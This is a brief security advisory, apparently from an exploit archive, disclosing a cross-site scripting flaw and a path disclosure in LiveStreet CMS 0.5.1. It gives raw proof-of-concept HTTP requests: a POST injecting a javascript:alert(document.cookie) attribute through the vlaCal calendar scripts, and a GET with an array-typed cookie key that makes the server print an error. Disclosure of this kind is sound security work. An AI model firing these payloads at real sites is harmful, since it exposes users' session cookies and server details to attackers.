LiveStreet Cross-Site Scripting Vulnerabilities & disclosure of directory Vulnerable: LiveStreet 0.5.1 http://livestreetcms.com/download/ Remote: Yes Local: No Credit: HiMIC (Babichev Igor) Livestreet XSS POST: File: /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/year.php /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php -------------- POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1 Content-Length: 53 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled= Host: blog.himic.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22 ------------------ Disclosure of directory: The error occurs because of the variable key in Cookies, when you create it as an array key [] error climbs -------------- GET /index.php HTTP/1.1 Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; key[]=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled= Host: Livestreet.ru Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* -------------- Site: http://blog.himic.ru/blog/security/162.html